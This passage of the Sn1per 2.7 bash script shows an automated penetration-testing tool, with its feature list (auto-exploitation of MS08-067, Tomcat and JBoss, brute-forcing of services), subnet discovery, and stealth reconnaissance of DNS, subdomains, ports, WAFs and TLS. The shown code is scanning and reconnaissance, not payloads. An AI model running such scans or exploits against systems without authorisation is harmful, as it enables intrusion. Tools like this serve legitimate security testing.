  19 | #* Automatically scans all web applications for common vulnerabilities
  20 | #* Automatically brute forces ALL open services
  21 | #* Automatically test for anonymous FTP access
  22 | #* Automatically runs WPScan, Arachni and Nikto for all web services
  23 | #* Automatically enumerates NFS shares
  24 | #* Automatically test for anonymous LDAP access
  25 | #* Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities
  26 | #* Automatically enumerate SNMP community strings, services and users
  27 | #* Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067
  28 | #* Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers
  29 | #* Automatically tests for open X11 servers
  30 | #* Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
  31 | #* Performs high level enumeration of multiple hosts and subnets
  32 | #* Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
  33 | #* Automatically gathers screenshots of all web sites
  34 | #* Create individual workspaces to store all scan output
  35 | 
  36 | 
  37 | ## FOR BLACKARCH
  38 | #  no need to install, just pacman -S sniper
  39 | #
  40 | ## KALI LINUX INSTALL:
  41 | #```
  42 | #./install.sh
  43 | #```
  44 | 
  45 | ## DOCKER INSTALL:
  46 | 
  47 | #Docker Install:
  48 | #https://github.com/menzow/sn1per-docker
  49 | 
  50 | #Docker Build:
  51 | #https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/
  52 | 
  53 | #Example usage:
  54 | #```
  55 | #$ docker pull menzo/sn1per-docker
  56 | #$ docker run --rm -ti menzo/sn1per-docker sniper menzo.io
  57 | #```
  58 | 
  59 | ## USAGE:
  60 | #```
  61 | #sniper <target> <report>
  62 | #sniper <target> stealth <report>
  63 | #sniper <CIDR> discover
  64 | #sniper <target> port <portnum>
  65 | #sniper <target> fullportonly <portnum>
  66 | #sniper <target> web <report>
  67 | #sniper <target> nobrute <report>
  68 | #sniper <targets.txt> airstrike <report>
  69 | #sniper <targets.txt> nuke <report>
  70 | #sniper loot
  71 | #sniper update
  72 | #```
  73 | 
  74 | ### MODES:
  75 | #* **REPORT:** Outputs all results to text in the loot directory for later reference. To enable reporting, append 'report' to any sniper mode or command.
  76 | #* **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking
  77 | #* **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
  78 | #* **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
  79 | #* **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.
  80 | #* **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
  81 | #* **NOBRUTE:** Launches a full scan against a target host/domain without brute forcing services.
  82 | #* **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP's that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
  83 | #* **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
  84 | #* **LOOT:** Automatically organizes and displays loot folder in your browser and opens Metasploit Pro and Zenmap GUI with all port scan results. To run, type 'sniper loot'.
  85 | 
  86 | ## SAMPLE REPORT:
  87 | # https://gist.github.com/1N3/8214ec2da2c91691bcbc
  88 | 
  89 | VER="2.7"
  90 | TARGET="$1"
  91 | MODE="$2"
  92 | OPT1="$3"
  93 | DISABLE_POSTGRESQL="true"
  94 | BROWSER="iceweasel" # SET DEFAULT BROWSER FOR OPENING LOOT DIR. CAN ALSO SET TO xdg-open... 
  95 | INSTALL_DIR="/usr/share/sniper"
  96 | LOOT_DIR="/usr/share/sniper/loot"
  97 | PLUGINS_DIR="/usr/share/sniper/plugins"
  98 | CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py"
  99 | SAMRDUMP="/usr/share/sniper/bin/samrdump.py"
 100 | DNSDICT6="/usr/share/sniper/bin/dnsdict6"
 101 | INURLBR="/usr/share/sniper/bin/inurlbr.php"
 102 | USER_FILE="/usr/share/brutex/wordlists/simple-users.txt"
 103 | PASS_FILE="/usr/share/brutex/wordlists/password.lst"
 104 | DNS_FILE="/usr/share/brutex/wordlists/namelist.txt"
 105 | SUPER_MICRO_SCAN="/usr/share/sniper/plugins/SuperMicro-Password-Scanner/supermicro_scan.sh"
 106 | DEFAULT_PORTS="21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,623,624,1099,1433,1524,2049,2121,3128,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,16992,27017,27018,27019,28017,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049"
 107 | DEFAULT_TCP_PORTS="21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,623,624,1099,1433,1524,2049,2121,3128,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,16992,27017,27018,27019,28017,49152"
 108 | DEFAULT_UDP_PORTS="53,67,68,88,161,162,137,138,139,389,520,2049"
 109 | THREADS="30"
 110 | OKBLUE='\033[94m'
 111 | OKRED='\033[91m'
 112 | OKGREEN='\033[92m'
 113 | OKORANGE='\033[93m'
 114 | RESET='\e[0m'
 115 | REGEX='^[0-9]+$'
 116 | 
 117 | # ENABLE/DISABLE AUTOMATIC BRUTE FORCE
 118 | # DEFAULT IS "1" (ENABLED)
 119 | AUTOBRUTE="1"
 120 | 
 121 | # ENABLE/DISABLE FULL DETAILED NMAP SCAN
 122 | # DEFAULT IS "1" (ENABLED)
 123 | FULLNMAPSCAN="1"
 124 | 
 125 | # ENABLE/DISABLE AUTOMATIC GOOGLE HACKING QUERIES
 126 | # DEFAULT IS "1" (ENABLED)
 127 | GOOHAK="1"
 128 | 
 129 | # ENABLE AUTO UPDATES
 130 | # DEFAULT IS "1" (ENABLED)
 131 | ENABLE_AUTO_UPDATES="1"
 132 | 
 133 | # CHECK DISTRO TYPE
 134 | DISTRO=$(cat /etc/*-release | grep DISTRIB_ID= | cut -d'=' -f2)
 135 | 
 136 | # CHECK FOR BLACKARCH LINUX
 137 | if grep -q BlackArch /etc/issue; then
 138 |   DISTRO='blackarch'
 139 |   echo "Detected BlackArch GNU/Linux"
 140 |   INSTALL_DIR=$(pwd)
 141 |   echo "Setting current path to $INSTALL_DIR"
 142 | fi
 143 | 
 144 | cd $INSTALL_DIR
 145 | 
 146 | function check_update {
 147 |   if [ "$ENABLE_AUTO_UPDATES" = "1" ]; then
 148 |     # echo -e "$OKBLUE + -- --=[Checking for updates...$RESET"
 149 |     LATEST_VER=$(curl -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
 150 |     if [ "$LATEST_VER" != "$VER" ]; then
 151 |       echo -e "$OKRED + -- --=[Sn1per v$LATEST_VER is available to download... To update, type \"sniper update\" $RESET"
 152 |     fi
 153 |   fi
 154 | }
 155 | 
 156 | function update {
 157 |   echo -e "$OKBLUE + -- --=[Checking for updates...$RESET"
 158 |   LATEST_VER=$(curl -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
 159 |   if [ "$LATEST_VER" != "$VER" ]; then
 160 |     echo -e "$OKRED + -- --=[Sn1per $LATEST_VER is available to download...Do you want to update? (y or n)$RESET"
 161 |     read ans
 162 |     if [ "$ans" = "y" ]; then
 163 |       rm -Rf /tmp/Sn1per/ 2>/dev/null
 164 |       git clone https://github.com/1N3/Sn1per /tmp/Sn1per/
 165 |       bash /tmp/Sn1per/install.sh
 166 |       rm -Rf /tmp/Sn1per/ 2>/dev/null
 167 |       exit
 168 |     fi
 169 |   fi
 170 | }
 171 | 
 172 | if [ "$TARGET" = "update" ]; then
 173 |   update
 174 |   exit
 175 | fi
 176 | 
 177 | function init {
 178 |   mkdir -p $LOOT_DIR 2> /dev/null
 179 |   mkdir $LOOT_DIR/domains 2> /dev/null
 180 |   mkdir $LOOT_DIR/screenshots 2> /dev/null
 181 |   mkdir $LOOT_DIR/nmap 2> /dev/null
 182 |   mkdir $LOOT_DIR/reports 2> /dev/null
 183 |   mkdir $LOOT_DIR/output 2> /dev/null
 184 |   TARGET="$(echo $TARGET | sed 's/https:\/\///g' | sed 's/http:\/\///g')"
 185 |   service postgresql start 2>/dev/null
 186 |   service metasploit start 2>/dev/null
 187 | }
 188 | 
 189 | function loot {
 190 |   echo -e "$OKRED                ____               $RESET"
 191 |   echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
 192 |   echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
 193 |   echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
 194 |   echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
 195 |   echo -e "$OKRED               /_/                 $RESET"
 196 |   echo ""
 197 |   echo -e "$OKORANGE + -- --=[Current workspaces...$RESET"
 198 |   cd $LOOT_DIR
 199 |   ls -lh $LOOT_DIR/workspace/
 200 |   echo -e "$OKORANGE + -- --=[Enter a name for the workspace:$RESET"
 201 |   read WORKSPACE
 202 |   if [ -z $WORKSPACE ]; then
 203 |     WORKSPACE="default"
 204 |   fi
 205 |   mkdir -p $LOOT_DIR/workspace/$WORKSPACE 2> /dev/null
 206 |   echo -e "$OKORANGE + -- --=[Generating reports...$RESET"
 207 |   for a in `ls sniper-*.txt 2>/dev/null`;
 208 |   do
 209 |     # HTML OUTPUT
 210 |     echo "$a" | aha --black > $LOOT_DIR/reports/$a.html
 211 |     cat "$a" | aha --black >> $LOOT_DIR/reports/$a.html
 212 |     # TEXT OUTPUT DISABLED
 213 |     #echo "$a" | aha --black > $LOOT_DIR/reports/$a
 214 |     #sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a >> $LOOT_DIR/reports/$a
 215 |     # CONSOLE OUTPUT
 216 |     mv $a $LOOT_DIR/output/
 217 |   done
 218 |   echo -e "$OKORANGE + -- --=[Removing blank web screenshots...$RESET"
 219 |   find /usr/share/sniper/loot/screenshots/ -size -10k -exec rm -f {} \; 2> /dev/null
 220 |   rm -f $LOOT_DIR/.fuse_* 2> /dev/null
 221 |   echo -e "$OKORANGE + -- --=[Starting Metasploit service...$RESET"
 222 |   /etc/init.d/metasploit start 2> /dev/null
 223 |   if [ -z $DISABLE_POSTGRESQL ]; then /etc/init.d/postgresql start 2> /dev/null; fi
 224 |   echo -e "$OKORANGE + -- --=[Importing NMap XML files into Metasploit...$RESET"
 225 |   msfconsole -x "workspace -a $WORKSPACE; workspace $WORKSPACE; db_import $LOOT_DIR/nmap/nmap*.xml; hosts; services; exit;"
 226 |   echo -e "$OKORANGE + -- --=[Copying loot to workspace: $WORKSPACE...$RESET"
 227 |   cp -Rf $LOOT_DIR/screenshots/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
 228 |   cp -Rf $LOOT_DIR/nmap/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
 229 |   cp -Rf $LOOT_DIR/domains/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
 230 |   cp -Rf $LOOT_DIR/output/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
 231 |   cp -Rf $LOOT_DIR/reports/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
 232 |   cp -Rf $LOOT_DIR/imports/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
 233 |   cp -Rf $LOOT_DIR/notes/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
 234 |   cp -Rf $LOOT_DIR/web/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
 235 |   rm -Rf $LOOT_DIR/{screenshots,nmap,domains,output,reports,imports,notes,web}/ 2> /dev/null
 236 |   mkdir $LOOT_DIR/{screenshots,nmap,domains,output,reports,imports,notes,web}/ -p 2> /dev/null
 237 |   echo -e "$OKORANGE + -- --=[Opening workspace directory...$RESET"
 238 |   if [ ${DISTRO} == "blackarch" ]; then
 239 |     firefox 2> /dev/null &
 240 |   else
 241 |     $BROWSER 2> /dev/null &
 242 |   fi
 243 |   sleep 2
 244 |   $BROWSER $LOOT_DIR/workspace/$WORKSPACE 2> /dev/null &
 245 |   sleep 2
 246 |   echo -e "$OKORANGE + -- --=[Launching Metasploit Pro Web UI...$RESET"
 247 |   $BROWSER http://localhost:3001/login 2> /dev/null &
 248 |   echo -e "$OKORANGE + -- --=[Launching Zenmap...$RESET"
 249 |   zenmap -f $LOOT_DIR/workspace/$WORKSPACE/nmap/ 2> /dev/null &
 250 |   echo -e "$OKORANGE + -- --=[Done!$RESET"
 251 | }
 252 | 
 253 | function help {
 254 |   echo -e "$OKRED                ____               $RESET"
 255 |   echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
 256 |   echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
 257 |   echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
 258 |   echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
 259 |   echo -e "$OKRED               /_/                 $RESET"
 260 |   echo ""
 261 |   echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
 262 |   echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3$RESET"
 263 |   echo -e "$OKORANGE + -- --=[Usage:"
 264 |   echo ""
 265 |   echo ' [*] sniper <target> <report>'
 266 |   echo ' [*] sniper <target> stealth <report>'
 267 |   echo ' [*] sniper <CIDR> discover'
 268 |   echo ' [*] sniper <target> port <portnum>'
 269 |   echo ' [*] sniper <target> fullportonly <portnum>'
 270 |   echo ' [*] sniper <target> web <report>'
 271 |   echo ' [*] sniper <target> nobrute <report>'
 272 |   echo ' [*] sniper <targets.txt> airstrike <report>'
 273 |   echo ' [*] sniper <targets.txt> nuke <report>'
 274 |   echo ' [*] sniper loot'
 275 |   echo ' [*] sniper update'
 276 |   echo ""
 277 |   echo ' + -- --=[Modes:'
 278 |   echo ''
 279 |   echo ' + -- --=[REPORT: Outputs all results to text in the loot directory for later reference. To enable reporting, append report to any sniper mode or command.'
 280 |   echo ' + -- --=[STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking'
 281 |   echo ' + -- --=[DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.'
 282 |   echo ' + -- --=[PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.'
 283 |   echo ' + -- --=[FULLPORTONLY:  Performs a full detailed port scan and saves results to XML.'
 284 |   echo ' + -- --=[WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.'
 285 |   echo ' + -- --=[NOBRUTE: Launches a full scan against a target host/domain without brute forcing services.'
 286 |   echo ' + -- --=[AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.'
 287 |   echo ' + -- --=[NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.'
 288 |   echo -e " + -- --=[LOOT: Automatically organizes and displays loot folder in your browser and opens Zenmap GUI with all port scan results. To run, type sniper loot.$RESET"
 289 |   echo ""
 290 |   echo ""
 291 |   check_update
 292 | }
 293 | 
 294 | if [ -z $TARGET ]; then
 295 |   echo -e "$OKRED                ____               $RESET"
 296 |   echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
 297 |   echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
 298 |   echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
 299 |   echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
 300 |   echo -e "$OKRED               /_/                 $RESET"
 301 |   echo -e ""
 302 |   echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
 303 |   echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3$RESET"
 304 |   echo -e "$OKORANGE + -- --=[Usage: sniper <target>$RESET"
 305 |   echo ""
 306 |   check_update
 307 |   exit
 308 | fi
 309 | 
 310 | if [[ $TARGET = "--help" ]]; then
 311 |   help
 312 |   exit
 313 | fi
 314 | 
 315 | if [[ ${TARGET:0:1} =~ $REGEX ]];
 316 | then
 317 |   SCAN_TYPE="IP"
 318 | else
 319 |   SCAN_TYPE="DOMAIN"
 320 | fi
 321 | 
 322 | # INITILIZE()
 323 | init
 324 | 
 325 | # CHECK FOR UPDATES
 326 | check_update
 327 | 
 328 | if [ "$MODE" = "report" ]; then
 329 |   $INSTALL_DIR/sniper $TARGET | tee $LOOT_DIR/sniper-$TARGET-`date +%Y%m%d%H%M`.txt 2>&1
 330 |   exit
 331 | fi
 332 | 
 333 | if [ "$TARGET" = "loot" ]; then
 334 |   loot
 335 |   exit
 336 | fi
 337 | 
 338 | if [ "$MODE" = "discover" ]; then
 339 |   echo -e "$OKRED                                                              ____ /\\"
 340 |   echo -e "$OKRED   Sn1per by 1N3 @CrowdShield                                      \ \\"
 341 |   echo -e "$OKRED   https://crowdshield.com                                          \ \\"
 342 |   echo -e "$OKRED                                                                ___ /  \\"
 343 |   echo -e "$OKRED                                                                    \   \\"
 344 |   echo -e "$OKRED                                                                 === > [ \\"
 345 |   echo -e "$OKRED                                                                    /   \ \\"
 346 |   echo -e "$OKRED                                                                    \   / /"
 347 |   echo -e "$OKRED                                                                 === > [ /"
 348 |   echo -e "$OKRED                                                                    /   /"
 349 |   echo -e "$OKRED                                                                ___ \  /"
 350 |   echo -e "$OKRED                                                                    / /"
 351 |   echo -e "$OKRED                                                              ____ / /"
 352 |   echo -e "$OKRED                                                                   \/$RESET"
 353 |   echo ""
 354 |   echo -e "$OKGREEN + -- ----------------------------=[Running Ping Discovery Scan]=------------- -- +$RESET"
 355 |   nmap -sP $TARGET | grep ' for ' | awk '{print $5}' | tee $LOOT_DIR/domains/sniper-ping-ips.txt
 356 |   echo -e "$OKGREEN + -- ----------------------------=[Checking ARP Cache]=---------------------- -- +$RESET"
 357 |   arp -a -n | tee $LOOT_DIR/domains/sniper-arp-ips.txt
 358 |   echo -e "$OKGREEN + -- ----------------------------=[Running TCP Port Discovery Scan]=--------- -- +$RESET"
 359 |   unicornscan -p $DEFAULT_TCP_PORTS $TARGET 2>/dev/null | tee $LOOT_DIR/domains/sniper-tcp-ports.txt
 360 |   cat $LOOT_DIR/domains/sniper-tcp-ports.txt | awk '{print $6}' | sort -u | tee $LOOT_DIR/domains/sniper-tcp-ips.txt
 361 |   echo -e "$OKGREEN + -- ----------------------------=[Running UDP Port Discovery Scan]=--------- -- +$RESET"
 362 |   unicornscan -m U -p $DEFAULT_UDP_PORTS $TARGET 2>/dev/null | tee $LOOT_DIR/domains/sniper-udp-ports.txt
 363 |   cat $LOOT_DIR/domains/sniper-udp-ports.txt | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-udp-ips.txt
 364 |   echo -e "$OKGREEN + -- ----------------------------=[Current Targets]=------------------------- -- +$RESET"
 365 |   cat $LOOT_DIR/domains/sniper-ping-ips.txt $LOOT_DIR/domains/sniper-tcp-ips.txt $LOOT_DIR/domains/sniper-udp-ips.txt > $LOOT_DIR/domains/sniper-ips-unsorted.txt
 366 |   sort -u $LOOT_DIR/domains/sniper-ips-unsorted.txt > $LOOT_DIR/domains/sniper-ips.txt
 367 |   cat $LOOT_DIR/domains/sniper-ips.txt
 368 |   echo -e "$OKGREEN + -- ----------------------------=[Launching Sn1per Scans]=------------------ -- +$RESET"
 369 |   echo ""
 370 |   if [ "$OPT1" = "report" ]; then
 371 |     for a in `cat $LOOT_DIR/domains/sniper-ips.txt`
 372 |     do sniper $a report
 373 |     done
 374 |     exit
 375 |   fi
 376 |   for a in `cat $LOOT_DIR/domains/sniper-ips.txt`
 377 |   do sniper $a
 378 |   done
 379 |   exit
 380 | fi
 381 | 
 382 | if [ "$MODE" = "web" ]; then
 383 |   if [ "$OPT1" = "report" ]; then
 384 |     sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
 385 |     loot
 386 |     exit
 387 |   fi
 388 | fi
 389 | 
 390 | if [ "$MODE" = "stealth" ]; then
 391 |   if [ "$OPT1" = "report" ]; then
 392 |     sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
 393 |     exit
 394 |   fi
 395 |   echo -e "$OKRED                ____               $RESET"
 396 |   echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
 397 |   echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
 398 |   echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
 399 |   echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
 400 |   echo -e "$OKRED               /_/                 $RESET"
 401 |   echo -e "$RESET"
 402 |   echo -e "$OKORANGE + -- --=[http://crowdshield.com"
 403 |   echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
 404 |   echo -e "$OKRED "
 405 |   echo -e "$OKRED     ./\."
 406 |   echo -e "$OKRED   ./    '\."
 407 |   echo -e "$OKRED   \.       '\."
 408 |   echo -e "$OKRED     '\.       '\."
 409 |   echo -e "$OKRED        '\.       '\."
 410 |   echo -e "$OKRED           '\.       '\."
 411 |   echo -e "$OKRED           ./           '\."
 412 |   echo -e "$OKRED         ./            ____'\."
 413 |   echo -e "$OKRED       ./                  <  '\."
 414 |   echo -e "$OKRED       \-------\            '>   '\."
 415 |   echo -e "$OKRED         '\=====>        ___<       '\."
 416 |   echo -e "$OKRED        ./-----/             __________'\."
 417 |   echo -e "$OKRED "'       \.------\       _____   ___(_)(_\."\'
 418 |   echo -e "$OKRED          '\=====>          <            ./'"
 419 |   echo -e "$OKRED         ./-----/            '>        ./"
 420 |   echo -e "$OKRED         \.               ___<       ./"
 421 |   echo -e "$OKRED           '\.                     ./"
 422 |   echo -e "$OKRED              '\.                ./"
 423 |   echo -e "$OKRED                 '\.           ./"
 424 |   echo -e "$OKRED                 ./          ./"
 425 |   echo -e "$OKRED               ./          ./  Carl Pilcher"
 426 |   echo -e "$OKRED             ./          ./"
 427 |   echo -e "$OKRED           ./          ./"
 428 |   echo -e "$OKRED         ./          ./"
 429 |   echo -e "$OKRED         \.        ./"
 430 |   echo -e "$OKRED           '\.   ./"
 431 |   echo -e "$OKRED              '\/"
 432 |   echo -e "$RESET"
 433 |   echo -e "$OKORANGE + -- --=[Launching stealth scan: $TARGET $RESET"
 434 |   echo -e "$OKGREEN $RESET"
 435 |   echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET"
 436 |   nslookup $TARGET
 437 |   host $TARGET
 438 |   if [ $SCAN_TYPE == "DOMAIN" ];
 439 |   then
 440 |     echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET"
 441 |     whois $TARGET
 442 |     echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET"
 443 |     theharvester -d $TARGET -l 100 -b bing 2> /dev/null
 444 |     echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
 445 |     dig -x $TARGET
 446 |     dnsenum $TARGET
 447 |     mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
 448 |     echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
 449 |     python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
 450 |     dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
 451 |     echo ""
 452 |     echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
 453 |     echo -e "$OKRED ║  ╠╦╝ ║ ╚═╗╠═╣$RESET"
 454 |     echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
 455 |     echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
 456 |     echo -e "$OKBLUE"
 457 |     curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
 458 |     echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
 459 |     cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null
 460 |     cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null
 461 |     sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
 462 |     rm -f /tmp/curl.out 2> /dev/null
 463 |     echo -e "$RESET"
 464 |     echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
 465 |     for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot|cloudfront|modulus" 2>/dev/null; done;
 466 |     echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
 467 |     python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
 468 |   fi
 469 |   echo ""
 470 |   echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
 471 |   nmap -sS -T5 --open -Pn -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 472 |   
 473 |   port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 474 |   port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 475 |   
 476 |   if [ -z "$port_80" ];
 477 |   then
 478 |     echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET"
 479 |   else
 480 |     echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET"
 481 |     echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
 482 |     wafw00f http://$TARGET
 483 |     echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
 484 |     whatweb http://$TARGET
 485 |     echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET"
 486 |     xsstracer $TARGET 80
 487 |     echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
 488 |     if [ ${DISTRO} == "blackarch"  ]; then
 489 |       /bin/CutyCapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg
 490 |     else
 491 |       cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg
 492 |     fi
 493 |   fi
 494 |   
 495 |   if [ -z "$port_443" ];
 496 |   then
 497 |     echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET"
 498 |   else
 499 |     echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET"
 500 |     echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
 501 |     wafw00f https://$TARGET
 502 |     echo -e "$OKGREEN + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +$RESET"
 503 |     cd $PLUGINS_DIR/CloudFail/
 504 |     python3 cloudfail.py --target $TARGET
 505 |     cd $INSTALL_DIR
 506 |     echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
 507 |     whatweb https://$TARGET
 508 |     echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET"
 509 |     xsstracer $TARGET 443
 510 |     echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET"
 511 |     sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET
 512 |     sslscan --no-failed $TARGET
 513 |     echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
 514 |     if [ ${DISTRO} == "blackarch"  ]; then
 515 |       /bin/CutyCapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg
 516 |     else
 517 |       cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg
 518 |     fi
 519 |     echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/$TARGET-port443.jpg"
 520 |   fi
 521 |   
 522 |   echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
 523 |   echo -e ""
 524 |   echo -e ""
 525 |   echo -e ""
 526 |   echo -e ""
 527 |   echo -e ""
 528 |   echo -e ""
 529 |   echo -e ""
 530 |   echo -e ""
 531 |   echo -e ""
 532 |   echo -e ""
 533 |   echo -e ""
 534 |   echo -e ""
 535 |   echo -e ""
 536 |   echo -e ""
